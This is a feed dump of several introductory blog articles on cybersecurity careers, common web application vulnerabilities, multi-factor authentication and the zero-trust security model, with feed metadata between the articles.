It is the job of cybersecurity experts to prevent any sort of data breach. It is their responsibility to analyze all possible ways that a malicious party can access your data. Cybersecurity analysts seek to create methods, rules, and frameworks to stop such attacks from occurring.

Cyberattacks are one of the fastest-growing crimes in the Western world, consistently building up in size, sophistication, and intensity. It is a no-brainer that companies are prepared to spend hundreds of thousands of dollars hiring the best cybersecurity professionals to protect their million-dollar empires.

Cybersecurity Careers in 2021

Cybersecurity itself is a very broad umbrella field, consisting of many smaller fields that focus on specific aspects of security. For someone new to cybersecurity, it can be daunting to determine which career path to take.

In this article, we have compiled a list of the most in-demand cybersecurity career paths in the market.

1. Penetration Testing

Penetration testing is one of the trendiest jobs in the world. If you are familiar with penetration testing, you might have already heard of this term, or other, similar terms, like ethical hacking and security testing. These terms all mean the same thing.

What Does a Penetration Tester Do?

The job of a penetration tester is to ‘penetrate’ an organization’s systems to discover any vulnerabilities and exploits that might exist in that system.

A penetration tester first plans out all possible methods and ways that he or she can use to exploit the vulnerabilities of a system. The penetration tester then uses all possible tools at his or her disposal to emulate malicious attacks on the system. He or she might even use software tools to hack misconfigured ports or rely on software engineering to get a password from an employee.

After the penetration tester is done performing all the necessary tests, he or she compiles a report detailing the tests that were performed and the responses received, as well as how any noted exploits were found. Then, the pen tester reports these findings so that a system or network administrator can patch the holes in the network.

What is the Demand for Penetration Testers?

Due to the ever-growing market of cloud-based technologies, everything is slowly becoming network-based. This has resulted in a higher-than-ever demand for cybersecurity experts. According to the U.S. Bureau of Labor Statistics, Information Security analysts, an umbrella category for cybersecurity-related jobs, have a projected percent change in employment of 31% from 2019 to 2029.

This is much higher than the average of 4% for other jobs. This means that if you decide to be a penetration tester, you can be sure that your skills will not become irrelevant 5 to 10 years down the line.

How Much Do Penetration Testers Earn?

According to PayScale, a leading website in salary assessment, the average yearly salary of a penetration tester is $85,134. This estimation is highly dependent on personal factors, such as the location of the job, your own experience level, and the industry that you work in.

How to Start a Career in Penetration Testing

The most important thing to have as a penetration tester is knowledge of how computer systems work. The better that you understand what makes or breaks a system, the better you can become at penetration testing.

To this end, having a bachelor’s degree in Computer Science, Cybersecurity, Networking, or any other IT-related field can be a big bonus for securing a job in penetration testing. But, that is not all. Certifications are often just as important in cybersecurity fields as degrees. Getting a certification in penetration testing can boost your reputation for potential hiring companies. Some good certifications include the PenTest+ offered by CompTia and the certification by the GIAC, but the most famous certifications are offered by Offensive Security (the makers of Kali Linux).

Most companies will not hire you if you have no experience in managing computer systems, so becoming a system or network administrator, gaining experience, and slowly transitioning into a penetration testing field is a great place to start.

2. Forensic Investigation

When it comes to hacking, it is not a surprise that most criminals do the same. It is a forensic investigator’s job to track all digital criminal activity in a network or device.

What Do Forensic Investigators Do?

The job of a forensic investigator is to gather evidence from a computer device for an investigation. The skills of a forensic investigator are necessary in the field of law where, in modern times, a lot of evidence is on computers.

Evidence of security breaches and DDOS attacks can most often be found left on servers, and it is the job of the forensic investigator to gather all the evidence and link it together to create a picture of what exactly happened.

A forensic investigator does this by copying all the data on the targeted device as an image and analyzing the data on this image, such as access dates of files, modification dates, data in unused space, deleted data, etc. These things help the forensic investigator to create a final report, analyzing everything that has been found, and providing system administrators and law teams with a clear picture of the data breach.

Importance of Forensic Investigators in the IT Industry

Forensic investigators have a specialized role in the IT community. Unlike penetration testers, who work to prevent security breaches, forensic experts do not prevent hacks but, rather, help in the aftermath. These professionals have the responsibility of finding who might have performed the hack and providing law teams with the evidence.

While it is low compared to other career paths in this list, the demand for cyber forensic experts is still very high, with a growth of 32% in job demand expected by the end of 2029. This job is in particular demand among law enforcement agencies, such as the FBI.

How Much Do Forensic Investigators Earn?

PayScale mentions on its website that an average forensic investigator earns $73,892. This pay depends on many factors, such as experience and industry. The yearly salary can range from around $50,000 for beginners to up to $118,000 for experienced professionals.

How to Become a Forensic Investigator

A base requirement for becoming a forensic investigator is an undergraduate degree in a field such as Computer Science or Computer Engineering. This provides the core foundation of knowledge in programming and computer systems that is required for any aspiring forensic investigator. Specialization in Cybersecurity in your degree can also be a big plus in the eyes of prospective employers.

Certifications for Cyber Forensics are a great way to show that you have the necessary skillset to become a Forensic investigator. These can be incredibly helpful in landing a job. Organizations like the International Association of Computer Investigation Specialists (IACIS) and AccessData provide useful, reputable certifications for forensic investigators.

Lastly, strong analytical and investigational skills can go a long way in helping you to develop your career. Gaining more experience in the field is vital to helping you develop such skills.

3. Risk Assessment

Businesses are always vulnerable to risks and data breaches. One wrong step and you can lose a lot of capital. Risk management is critical to every organization, and the process starts at risk assessment.

What Do Risk Assessors Do?

Like the name indicates, risk management is primarily a proactive approach to analyze potential threats and risks to businesses. The main job of a risk assessor is to keep tabs on the risk profiles in an organization’s IT resources.

A risk assessor determines the impact of a security and data compromise on an organization. Resultantly, he or she would collaborate with a Vulnerability Management team to reduce risks to an acceptable level and make proactive measures.

An organization may or may not be familiar with the importance of some systems for their existence. A Risk Assessor must use his or her analysis capabilities to analyze levels of dependency in different areas of the company.

For example, a programmer may consider a single library to not be as important to the system, but a failure inside this library may result in a failure of the entire system. Most organizations cannot afford such system failures, so they hire risk assessment experts to analyze these risks.

What is the Demand for Risk Assessment Specialists?

The overall market for risk management and assessment specialists has been growing for the last 15 years, with an average growth of about 4.85% every year. And this is seemingly growing every single year. More than 15,000 jobs were posted with requirements for a risk assessment specialist.

How Much Do Risk Assessment Specialists Earn?

Although total earnings can be as steep as $187,000 and as little as $27,500, many salaries for risk assessment specialists fall between $69,000 (25th percentile) and $133,000 (75th percentile) in the United States. The overall pay range for a risk assessor varies wildly (up to $64,000), which implies that there may be fewer skill-based growth opportunities, but it is still possible to increase pay based on location and years of experience. [1][2]

How to Become a Risk Assessment Specialist

Risk analysis jobs require a minimum of an undergraduate degree in Computer Sciences, Programming, Business, Finance, or related fields. A cybersecurity risk analysis expert should be comfortable with Software Architecture, Operating Systems. Most importantly, a risk assessor must be familiar with programming languages and logic building.

Larger Institutions and multinational organizations may prefer a Master’s graduate degree or even an MBA in Information Systems. System Analysis and comprehension of existing Risk Management capabilities inside an organization is a must for any risk assessment specialist.

4. SOC (Defense Security)

Cybersecurity remains one of the biggest IT industries, and many organizations have invested millions in the research and development of an effective Information Security framework. Security Operation Center, or SOC, is one of the most popular InfoSec frameworks, and with good reason.

What Does a SOC Defense Security Specialist Do?

Recently, the OWASP Project for web app security has created the Security Operation Center (SOC) structure for companies to mitigate cyber-attacks using appropriate technical regulations.

In addition to contributing to cybersecurity incidents, the other main goals of SOC include creating an organization resilient to future threats, providing effective security controls, and allowing prompt detection of threats.

How Much Do SOC Defense Security Specialists Earn?

SOC is a niche field that sees little demand in the market but has a very high paid salary. A typical Cybersecurity Defense Security specialist working in SOC will earn about $120,000 per year. As an entry-level SOC expert, you may expect a salary ranging from $84,000 to $150,000. [1][2]

How to Become a Defense Security Specialist

Since a SOC specialist in Defense Security is a fundamentally complex role in the world of cybersecurity, there are many career paths that you can follow at first, and rise up through the ranks into a specific SOC role.

Some companies require an undergraduate degree and at least 4-5 years of work experience for an entry-level role in SOC. A technical bachelor’s degree can help you get into the cybersecurity industry and move your way up into a role in SOC. Having a master’s degree specializing in cybersecurity or the approved certifications will prove invaluable to start your career.

5. Malware Analyst (Reverse Engineering)

Imagine you are working with a big organization and there is a lot of sensitive information on your laptop. Suppose you are attacked by malware and you send the laptop to the cybersecurity department, only to hear that they have never seen this malware before. This is where a Malware Analyst offers his or her expertise.

What Does a Malware Analyst Do?

A malware analyst is tasked with analyzing malware, trojans, worms, spyware, and other such malicious programs to understand how they work. A malware analyst works by decompiling and deconstructing malware.

This might be performed by running the malware in a sandboxed environment and seeing what it changes. Otherwise, the analyst could run the malware through a debugger and try to understand the process and purpose of the malicious program. Malware analysts employ a variety of techniques and tools to reverse-engineer viruses.

Malware analysts are very important for modern internet infrastructure. It is the job of malware analysts to deconstruct a virus to understand what makes it work. They use this information to generate a signature for the malware, which is used by antivirus programs on millions of computers to identify malicious software as it enters the system.

How Much Do Malware Analysts Earn?

The salary of the average malware analyst is an astounding $92,880, according to PayScale. This is much higher than the average. The starting salary of $66,000 is also way above the average salary of cybersecurity experts.

With the growing market of anti-viruses, malware analysts can rest assured that their skills are not only in demand today, but will also be in the future. [1][2]

How to Become a Malware Analyst

As in all cybersecurity careers, a bachelor’s degree in computer science or computer engineering is a must for this career path. You should especially focus on Operating Systems, Computer Architecture, and other subjects that are needed to understand low-level programming. A good understanding of Debuggers, Assembly Language, and all other Interpreted and Compiled languages, in addition to previous malware analysis work, can also help in developing the necessary skillset to become a malware analyst.

Certifications for malware analysts include the GIAC Reverse Engineering Malware (GREM) certification and the Certified Information Systems Security Professional (CISSP). These are two great certifications to have in your resume.

6. Incident Response Analyst

Have you ever wondered what happens when a cyber-attack occurs? How do companies and businesses do damage repentance? They have a special incident response analyst team at their discretion that will help them respond appropriately to the incoming attack while minimizing the damage.

What Does an Incident Response Analyst Do?

An incident response analyst works with a response team to determine and evaluate cyber threats to the security systems of an organization. An incident response analyst is also responsible for avoiding escalation of serious security threats, providing reports to the security team of the organization, using tools to minimize the impact of a security breach on the computer network, and conducting analysis to ensure that the computer network of the organization is clear of threats.

The duties of an incident response analyst also include implementing and optimizing security tools to avoid the recurrence of safety problems. An incident response analyst may also communicate about security threats with law enforcement, if necessary.

The incident responder is responsible for using digital forensics tools to evaluate and analyze digital media in cases of suspected computer hacking. The responder then reports the results in an easy-to-read format. Because many computer-related concepts can be very technical, it is essential to create the reports in words that everyone can understand. The reports could eventually be used as proof in legal cases.

Incident respondents may also be called as fact or expert witnesses to testify in court. They may also be working to develop incident remediation solutions with outside departments.

How Much Does an Incident Response Analyst Earn?

Recent surveys show pay rates as elevated as $115,000+ for incident response analysts, while PayScale brings an average yearly wage of $80,247. Top-paying industries include finance and banking, enterprise and consulting, and IT. According to PayScale, you are most likely to get an incident response analyst job in cities like New York, Atlanta, and Seattle, while Cisco, BoA, and Covestic are among the highest-paying employers for such jobs. [1][2]

How to Become an Incident Response Analyst

The most important part of being an Incident Responder is to react appropriately to compromising circumstances. Soft skills, such as adaptability, perseverance, and, most importantly, a good understanding of the field is extremely important to this profession. Additionally, communication is also a key factor in this field, as analysts must communicate about incidents to law enforcement agents and corporate sectors. Most companies hiring security incident response analysts will look for such qualities.

The qualification requirements for incident analysts include a bachelor’s degree in Computer Science or Cybersecurity. You must have at least two to three years of work experience in the cybersecurity industry before you can be hired as an incident response analyst. You would also be required to be experienced in security technologies, such as SSL, HTTP, and HTTPS, along with an understanding of major operating systems, including Windows, Linux, and Mac OS.

Next Steps

There is more advanced technology on your smartphone than it took to land a man on the moon. Half a century ago, the idea of a hand-held mobile device would be considered fiction. With technology changing so fast, everyone’s privacy is now under threat of attack, especially since most data is digital and stored online.

It does not come as a surprise how much the cybersecurity industry has grown in the last decade, and how much this field is expected to continue to grow. There are a lot of Cybersecurity career paths that you can choose from and a lot of room for you to grow in. We advise you to start learning today. Take one tiny step at a time, and without even realizing, you will be a mile from where you began. If you work hard enough, there is no doubt you can achieve your dream profession.

References

  1. https://www.ziprecruiter.com/Salaries/Risk-Assessor-Salary
  2. https://www.salary.com/research/salary/recruiting/risk-assessment-specialist-salary/san-jose-ca
]]>
10 Types of Security Vulnerabilities https://linuxhint.com/common_security_vulnerabilities/ Tue, 29 Sep 2020 13:56:00 +0000 https://linuxhint.com/?p=69149 An unintended or accidental flaw in the software code or any system that makes it potentially exploitable in terms of access to illegitimate users, malicious behaviours like viruses, trojans, worms, or any other malware is called a security vulnerability. The use of software that has already been exploited or the use of weak and default passwords also results in making the system vulnerable to the outside world. These types of security vulnerabilities require patching to prevent hackers from using previously used exploits on them again to gain unauthorized access to the system. A security vulnerability also called security hole or weakness is a flaw, a bug, or a fault in the implementation of code, design, and architecture of a web application and servers, which when left unaddressed can result in compromising of the system and makes the whole network vulnerable to the attack. The people going to be infected include the application owner, application users, and any other person relying on that application. Let’s look at the most dangerous and common security risks to web applications.

Table of Contents

  1. Database Injection
  2. Broken Authentication
  3. Sensitive Data Exposure
  4. XML External Entities (XEE)
  5. Broken Access Control
  6. Security Misconfiguration
  7. Cross-site Scripting (XSS)
  8. Insecure Deserialization
  9. Using Components with Known Vulnerabilities
  10. Insufficient Logging and Monitoring

Database Injection:

In case of sending untrusted pieces of data to the interpreter as a part of command through any area that takes user input i.e form input or any other data submission area, injection flaws occur. The attacker’s malicious queries can trick the interpreter into executing commands that can show up confidential data that the user has no authorization to have a look at. For example in an SQL injection attack, when the form input is not properly sanitized,  the attacker can enter the SQL database and access its contents without authorization, just by entering malicious SQL database code in a form that is expecting a plaintext. Any type of field that takes the user’s input is injectable i.e parameters, environment variables, all web services, etc.

The application is vulnerable to the injection attack when user-supplied data is not sanitized and validated, by the use of dynamic queries without context-aware escaping and the use of hostile data directly. Injection flaws can easily be discovered through the examination of code and by the use of automated tools like scanners and fuzzers. To prevent injection attacks, there is some measure that can be taken like separating the data from commands and queries, use of a safe API that provides a parameterized interface, use of “white-list” server-side input validation through tools like Snort, escaping of special characters using specific escape syntax, etc.

An injection attack can lead to a massive data loss, disclosure of confidential information, denial of access and it can even lead to a complete application takeover. Some SQL controls like LIMIT can be used to control huge amounts of data loss in case of an attack. Some types of injection attacks are SQL, OS, NoSQL, LDAP injection attacks.

Broken authentication:

Attackers can access user accounts and can even compromise the whole host system through admin accounts, using the vulnerabilities in authentication systems. Authentication flaws allow the attacker to compromise passwords, session tokens, authentication keys and can be chained with other attacks that can lead to unauthorized access of any other user account or session temporarily and in some cases, permanently. Let’s say a user has a wordlist or a dictionary of millions of valid user names and passwords obtained during a breach. He can use them one by one in an extremely less time using automated tools and scripts on the login system to see if anyone does work. Poor implementation of identity management and access controls leads to vulnerabilities like broken authentication.

The application is vulnerable to authentication attack when it permits trying of different usernames and passwords, permits dictionary attacks or brute force attacks without any defense strategy, use easy, default passwords or passwords that are leaked in any breach, exposes session ids in URL, uses poor password recovering scheme, uses a pattern of cookies. Broken authentication can be exploited easily using simple tools for brute-forcing and dictionary attacks with a good dictionary. These types of attacks can be prevented using multi-factor authentication systems, by implementing weak password checks by running a password through a bad passwords’ database, by not using default credentials, by aligning password complexity policy, by the use of good server-side session manager which generates a new random session-id after login, etc.

Broken authentication vulnerability can result in compromising a few user accounts and an admin account, that is all an attacker needs to compromise a system. These types of attacks lead to identity theft, social security fraud, money laundering, and disclosure of highly classified information. The attacks include dictionary attacks, brute-forcing, session hijacking, and session management attacks.

Sensitive data exposure:

Sometimes web applications do not protect sensitive data and info like passwords, database credentials, etc. An attacker can easily steal or modify these weakly protected credentials and use it for illegitimate purposes. Sensitive data should be encrypted while at rest or in transit and have an extra layer of security otherwise attackers can steal it. Attackers can get their hands on sensitive exposed data and steal hashed or clear text users & database credentials off the server or a web browser. For example, if a password database uses unsalted or simple hashes to store passwords, a file upload flaw can allow an attacker to retrieve the passwords database which will lead to exposure of all passwords with a rainbow table of pre-calculated hashes.

The main flaw is not only that the data is not encrypted, even if it is encrypted, but weak key generation, weak hashing algorithms, weak cipher usage can also result in these types of one of the most common attacks. To prevent these types of attacks, first, classify which kind of data can be considered as sensitive according to the privacy laws and apply controls as per classification. Try not to store any classified data you don’t need, wash it as soon as you use it. For the data in transit, encrypt it with secure protocols i.e TLS with PFS ciphers, etc.

These types of vulnerabilities can result in the exposure of highly sensitive information like credit card credentials, health records, passwords, and any other personal data that can lead to identity theft and bank fraud, etc.

XML External Entities (XEE):

Poorly configured XML processors process external entity references inside XML documents. These external entities can be used to retrieve internal files’ data like /etc/passwd file or to perform other malicious tasks.  Vulnerable XML processors can easily be exploited if an attacker can upload an XML document or include XML etc. These vulnerable XML entities can be discovered using SAST and DAST tools or manually by inspecting dependencies and configurations.

A web application is vulnerable to the XEE attack due to many reasons like if the application accepts direct XML input from untrusted sources, Document Type Definitions(DTDs) on the application are enabled, the application uses SAML for identity processing as SAML uses XML for identity insertions, etc. XEE attacks can be mitigated by avoiding serialization of sensitive data, using less complicated data formats i.e JSON, patching XML processors the application is curren’]tly using and even the libraries, disabling DTDs in all XML parsers, validation of XML file upload functionality using XSD verification, etc.

The application vulnerable to these types of attacks can lead to DOS attack, Billion Laughs’ attack, scanning of internal systems, internal port scanning,  executing a remote command which results in affecting all application data.

Broken Access Control:

Access Control is giving users privileges to do specific tasks. Broken access control vulnerability takes place when the users are not properly restricted on the tasks they can perform. Attackers can exploit this vulnerability that can end up in accessing unauthorized functionality or information. Let’s say a web application allows the user to change the account he is logged in from just by changing the URL to another user’s account without further verification.  Exploiting the access control vulnerability is a go-to attack of any attacker, this vulnerability can be found manually as well as by using SAFT and DAFT tools. These vulnerabilities exist due to a lack of testing and automated detection of web applications although the best way to find them is to do it manually.

Vulnerabilities contain privileges escalation i.e acting as a user you are not or acting as an admin while you are a user, bypassing access control checks just by modifying the URL or changing the application’s state, metadata manipulation, allowing the primary key to be changed as another user’s primary key, etc. To prevent these kinds of attacks, access control mechanisms must be implemented in server-side code where attackers can’t modify the access controls. Enforcement of unique application business limits by domain models, disabling of listing server directories, alert admin on repeated failed login attempts, invalidation of JWT tokens after the logout must be ensured to mitigate these kinds of attacks.

Attackers can act as another user or administrator using this vulnerability to perform malicious tasks like creating, deleting and modifying records, etc. Massive data loss can occur if the data is not secured even after a breach.

Security misconfiguration:

The most common vulnerability is security misconfiguration. The main reason for the vulnerability is the use of default configuration, incomplete configuration, Adhoc configurations, poorly configured HTTP headers, and verbose error messages containing more info than the user actually should have known. At any level of a web application, security misconfigurations can occur i.e database, web server, application server, network services, etc. Attackers can exploit unpatched systems or access unprotected files and directories to have an unauthorized hold on the system. For example, an application excessively verbose error messages that help the attacker to know vulnerabilities in the application system and the way it works. Automated tools and scanners can be used to detect these types of security flaws.

A web application contains this type vulnerability if it is missing the security hardening measures across any part of the application, unnecessary ports are open or it enables unnecessary features, default passwords are used, error handling reveals over informative errors to the attacker, it is using unpatched or outdated security software, etc. It can be prevented by removing unnecessary features of the code, i.e a minimal platform without unnecessary features, documentation, etc, enabling a task to update and patch the security holes as part of patch management processes, the use of a process to verify the effectiveness of security measures taken, the use of repeatable hardening process to make it easy to deploy another environment that is properly locked down.

These types of vulnerabilities or flaws allow the attacker to gain unauthorized access to system data which leads to the complete compromisation of the system.

Cross-Site Scripting (XSS):

XSS vulnerabilities happen at the point when a web application incorporates untrusted data in a new website page without legitimate approval or escaping, or refreshes a current site page with client-provided data, utilizing a browser API that can make HTML or JavaScript.  XSS flaws occur in case the website allows a user to add custom code into a URL path which can be seen by other users. These flaws are used to run malicious JavaScript code on the target’s browser. Let’s say, an attacker can send a link to the victim containing a link to any company’s website. This connection could have some malicious JavaScript code embedded in it, In case that the bank’s webpage isn’t appropriately secured against XSS attacks, on clicking on the link the malicious code will be run on the victim’s browser.

Cross-Site Scripting is a security vulnerability that is present in almost ⅔ of the web applications. An application is vulnerable to XSS if the application stores an unsanitized user input that can be seen by another user, by the use of JavaScript structures, single-page applications, and APIs that powerfully incorporate attacker controllable information to a page are helpless against DOM XSS. XSS attacks can be mitigated by the use of frameworks that escapes and sanitize XSS input by nature like React JS etc, learning the limitations of frameworks and cover them using one’s own cases, escaping unnecessary and untrusted HTML data everywhere i.e in HTML attributes, URI, Javascript, etc, use of context-sensitive encoding in case of modifying document on client-side, etc.

XSS based attacks are of three types i.e Reflected XSS, DOM XSS, and Stored XSS. All types of these attacks have a significant amount of impact but in the case of Stored XSS, the impact is even larger i.e stealing of credentials, sending malware to the victim, etc.

Insecure deserialization:

The serialization of data means taking objects and converting them to any format so that this data can be used for other purposes later on, while deserialization of data means the opposite of that. Deserialization is unpacking this serialized data for the use of applications. Insecure deserialization means tempering of data that has been serialized just before that is about to be unpacked or deserialized.  Insecure deserialization leads to the remote code execution and it is used to perform other tasks for malicious purposes like privileges escalation, injection attacks, replay attacks, etc. There are some tools available for discovering these kinds of flaws but human assistance is needed frequently to validate the problem. Exploiting deserialization is a bit difficult as the exploits won’t work without some manual changes.

When the application deserializes malicious objects supplied by the attacking entity. This can lead to two types of attacks i.e attacks related to data structure and objects in which the attacker modifies application logic or execute remote code and typical data tampering attacks in which existing data structures are used with modified content for example access control related attacks.  Serialization can be used in remote process communication (RPC) or an inter-process communication (IPC), caching of data, web services, databases cache server, file systems, API authentication tokens, HTML cookies, HTML form parameters, etc. Deserialization attacks can be mitigated by not using serialized objects from untrusted sources, implementing integrity checks, isolating the code running in a low privileged environment, monitoring incoming and outgoing network connections from servers that deserialize frequently.

Using components with known vulnerabilities:

Different components like libraries, frameworks, and software modules are used by most of the developers in the web application. These libraries help the developer to avoid unnecessary work and provide the functionality needed. Attackers look for flaws and vulnerabilities in these components to coordinate an attack. In case of finding a security loophole in a component can make all the sites using the same component, vulnerable. Exploits of these vulnerabilities are already available while writing a custom exploit from scratch takes a lot of effort. This is a very common and widespread issue, the use of large amounts of components in developing a web application can lead to not even knowing and understanding all components used, patching and updating all the components is a long go.

An application is vulnerable if the developer doesn’t know the version of a component used, the software is outdated i.e the operating system, DBMS, software running, runtime environments and the libraries, the vulnerability scanning is not done regularly, the compatibility of patched software are not tested by the developers. It can be prevented by removing unused dependencies, files, documentation, and libraries, checking the version of the client and server-side components regularly, obtaining components and libraries from official and trusted secure sources,  monitoring the unpatched libraries and components, ensuring a plan for updating and patching vulnerable components regularly.

These vulnerabilities lead to minor impacts but can also lead to compromisation of the server and the system. Many large breaches relied on known vulnerabilities of components. The use of vulnerable components undermine application defences and can be a starting point for a large attack.

Insufficient logging and monitoring:

Most systems don’t take enough measures and steps to detect data breaches. The average response time of an incident is 200 days after it has happened, this is a lot of time to do all the nasty stuff for an attacking entity. Insufficient logging and monitoring allow the attacker to further attack the system, maintain its hold on the system, tamper, hold and extract data as per the need. Attackers use the lack of monitoring and response in their favour to attack the web application.
Insufficient logging and monitoring occur at any time i.e logs of applications not being monitored for unusual activities, auditable events like failed login attempts and high transaction values are not properly logged, warnings and errors generate unclear error messages, no trigger alert in case of pentesting using automated DAST tools,  being unable to detect or alert active attacks quickly, etc. These can be mitigated by ensuring all the login, access control failures,  and server-side input validation can be logged to identify malicious user account and held for enough amount of time for delayed forensic investigation, by ensuring that the logs generated are in a format compatible with centralized log management solutions, by ensuring integrity checks at high-value transactions, by establishing a system for timely alerts of suspicious activities, etc.

Most of the successful attacks start with checking and probing for vulnerabilities in a system, allowing these vulnerability probing can result in compromising the whole system.

Conclusion:

The security vulnerabilities in a web application affect all the entities related to that application. These vulnerabilities must be taken care of to provide a safe and secure environment for the users. Attackers can use these vulnerabilities to compromise a system, get hold of it, and escalate privileges. The impact of a compromised web application can be visualized from stolen credit card credentials and identity theft to the leaking of highly confidential information etc. depending on the needs and attack vectors of malicious entities.

]]>
What is Multi-Factor Authentication https://linuxhint.com/multi_factor_authentication/ Sat, 26 Sep 2020 18:24:41 +0000 https://linuxhint.com/?p=69300 Multi-Factor authentication otherwise known as MFA or 2FA means that you need more than one credentials to get access to your IT resources such as your applications, systems, files, or networks. Username and password as security credentials are more likely to be vulnerable to brute force attacks and they can be hacked or cracked by hackers. We can add extra security to our resources using Multi-Factor authentication. MFA enhances the security of the system by authorized users using more than one credentials. If a hacker hacks your password, he will not be able to get into your system unless and until he provides secondary credentials generated by a multi-factor authentication device. Multi-Factor authentication involves authentication factors to authorize a user along with a username and password. That authentication factor may be a hardware, a software program, a location where you are, a specific time window, or something you can remember just like your username and password. Some of the compatible Multi-Factor authentication programs which you can use after installing them into your mobile phone are listed below.

  • Authy
  • Google Authenticator
  • LetPass Authenticator
  • Duo
  • Okta Verify
  • Free OTP

Some other authenticators, which are not listed above may also be compatible.

Difference between MFA and 2FA

So what’s the difference between 2FA and MFA? Securing your data in such a way that it will be accessible when you provide extra credentials other than your username and password. You get access to your data if and only if you prove your identity using separate credentials generated by different methods.

2FA is a subset of MFA. In 2 Factor Authentication, a user is required to provide exactly two authentication credentials one of them being a simple password and another being an authentication token generated by any 2FA device.

Authentication Factors in MFA

Authentication Factors are different methods of using multi-factor authentication to make your resources more secure. The following are some categories that can be used as Multi-Factor authentication factors.

  • Knowledge: Authentication Factor may be something a user knows or memorizes just like his username and password. Security questions are the best example of knowledge as an authentication factor.
  • Possession: The authentication factor may be something a user is the owner of. For example, a code sent to your smartphones or any other hardware device.
  • Inherence: The inherence factor also known as a biometric identifier is a category that involves something that is inherent to a user like a fingerprint, retina or voice, etc.
  • Time: The authentication factor may be a time window during which a user can prove his identity. For example, you can set a specific time window to access your system, and other than that time span, no one will be able to access the system.
  • Location: This type of authentication factor involves the physical location of the user. In this case, you set your system to determine your physical location and your system can only be accessed from a specific location.

How Multi-Factor Authentication Works

In this section, we will discuss how all the authentication factors work listed above.

Knowledge Factor:

The knowledge factor is just like a username and password that a user has to remember and provide to access his IT resources. Setting a security question or secondary credentials to your resources can make the security of your resources more stronger as anyone will no longer be able to access your resources without providing that extra credentials even if they have your username and password. Missing that secondary credential may lead to losing your resources permanently.

Possession Factor:

In this case, a user has a third-party hardware device or a software program installed on his smartphone to generate a secondary credential. Whenever you try to access your system, it will ask for the secondary credential and you will have to provide that secondary credential generated by a third-party module you have, to access your system. SMS authentication token and Email authentication token are different types of authentication using the possession factor. Anyone having access to your MFA device may access your system so you have to take care of the MFA device.

Inherence Factor:

In this category, you use something that is inherent to you, as a secondary credential. Using fingerprint scans, voice recognition, retinal or Iris scans, facial scans, and other biometric identifications as secondary credentials are the best examples of the Inherence Factor. It is the best method to secure your resources using Multi-factor authentication.

Time Factor:

You can also use Time as an authentication factor to secure your IT resources. In this scenario, we specify a specific time window during which we can access our resources. Outside that specific time window, your resources will no longer be accessible. This kind of factor is useful when you have to access your resources during a specific time only. If you need to access your resources randomly, then this factor is not suitable.

Location Factor:

To make your application and other IT resources more secure, you can also use Location-based multi-factor authentication. In this type of authentication, you can block or give access to different users from different network locations. This type of authentication can be used to block access from different regions or countries where you know traffic should not come from. This type of authentication factor sometimes can be cracked easily by changing IP addresses so this type of authentication may fail.

Conclusion

With the increase in the IT industry, saving user data securely is a big challenge for organizations. Where network administrators are trying to make their networks more secure, new algorithms are also being designed to save user credentials securely. Sometimes traditional usernames and passwords are not enough to block unnecessary access to your data. Hackers find a way to a database and they take user credentials and it can reduce a user’s confidence in the traditional way of securing the user’s credentials. So here comes multi-factor authentication to make sure that no one will be able to access a user’s data except him. Adding multi-factor authentication to your application shows how much you care about your customers’ security and take it seriously.

]]>
Zero Trust Security Model https://linuxhint.com/zero_trust_security_model/ Mon, 21 Sep 2020 06:00:27 +0000 https://linuxhint.com/?p=68808

Introduction

The Zero Trust Network, also called Zero Trust Architecture, is a model that was developed in 2010 by the principal analyst John Kindervag. A zero-trust security system helps to protect the enterprise system and improves cybersecurity.

Zero Trust Security Model

The Zero Trust Security Model is a security system concept that focuses on the belief that organizations and incorporations should never believe everything that is either inside or outside its borders and on the other side it must verify and clarify everything and anyone that tries to have a connection to its system before you grant any access to it.

Why Zero Trust?

One of the main reasons for using security models is that cybercrime costs the world billions and trillions of dollars all over the world.

The Annual Cybercrime report has said that cybercrime will cost the world $6 trillion per year in 2020, and this rate is continuous and will increase in the future.

Protection for a New and Cybercrime-Free World

The Zero Trust Security Model of information security kicks the old view that organizations focused on defending perimeters while thinking that everything already inside the perimeter did not constitute a threat, and therefore the organization was clear of any threat inside their parameter.

Security and technology experts suggest that this approach is not working. They point to internal breaches that had happened in the past because of cybercrime and hacking. Data breaches have often happened in the past because, when hackers had the chance to gain access to the organization’s firewalls, they easily got into the internal systems without any resistance. This proves that even firewalls cannot protect a system from a hacker breach. There is also a bad habit of trusting anything and anyone without checking.

Approach Behind Zero Trust

The Zero Trust approach depends upon modern technologies and methods to achieve the target of securing an organization.

The Zero Trust Model calls for businesses to manipulate micro-segmentation and granular perimeter execution based on users, their whereabouts, and other data or information, to find out whether to believe a user, machine, or application that is trying to seek access to a specific part of the enterprise or organization.

Zero Trust also takes care of all other policies, for example, giving users the least access they require to complete the task they want to complete. Creating a Zero Trust environment is not only about putting into practice the separate singular technology associations; it is also about using these and other technologies to impose the idea that no one and nothing should have access until they have proven that they should be trusted.

Of course, organizations know that creating a Zero Trust Security Model is not an overnight achievement. Because it is not easy to achieve something so complex in a single night, it can take years to find the most secure, ideal system possible.

Many companies are shifting to the cloud security system. These systems have the best options to go to Zero Trust. Now is the time to be ready for a Zero Trust transition. All organizations, either large or small, or should have Zero Trust security systems for their data safety.

Many IT experts blindly trust their security system, hoping that their data is kept safe with firewalls, while this is not necessarily true. Everybody has been taught to understand that the firewall is the best thing to keep hackers out of the way. We need to understand that hackers are currently within range of our sensitive data and that any security breach can happen at zany time. It is our responsibility to take care of our security in every possible way.

Organizations also need to know that Zero Trust still requires continuous effort, as does any other IT or security protocol or system, and that certain aspects of the Zero Trust Security Model may develop more challenges than other security protocol systems, according to some experts. Because of the difficulties associated with using Zero Trust Security Models, some companies have not been able to fully put this model into practice.

We should use the Zero Trust Model as a compulsory part of our security management to help in the advancement of security protocols. We should think about the Zero Trust Security Model as an infrastructural transformation. Our security technologies are outdated, and the world is modernizing day by day. But, you have to change the way you take care of the security of your system. You may want to think about ubiquitous security; we have to be reactive, so all we have to do is think about security differently.

In a Zero Trust Model, access may be granted only after checking all the possibilities associated with danger, advantages, and disadvantages. We are now living in an era where we cannot trust that only having a firewall in the system will help save us from hackers and cybercrimes.

Conclusion

In conclusion, Zero Trust should be the rule of organizing strict access to your information or data. This model is simply based on not trusting a single person with sensitive data. We must have Zero Trust Security Models in our systems so that we are safe from hacking. To have maximum security, we must implement Zero Trust security systems in organizations that require tough security for their data. We can no longer only trust firewalls to protect us from cybercrimes, and we have to do something about it ourselves.

]]>
Steps of the cyber kill chain https://linuxhint.com/cyber_kill_chain_steps/ Wed, 16 Sep 2020 19:20:21 +0000 https://linuxhint.com/?p=68427

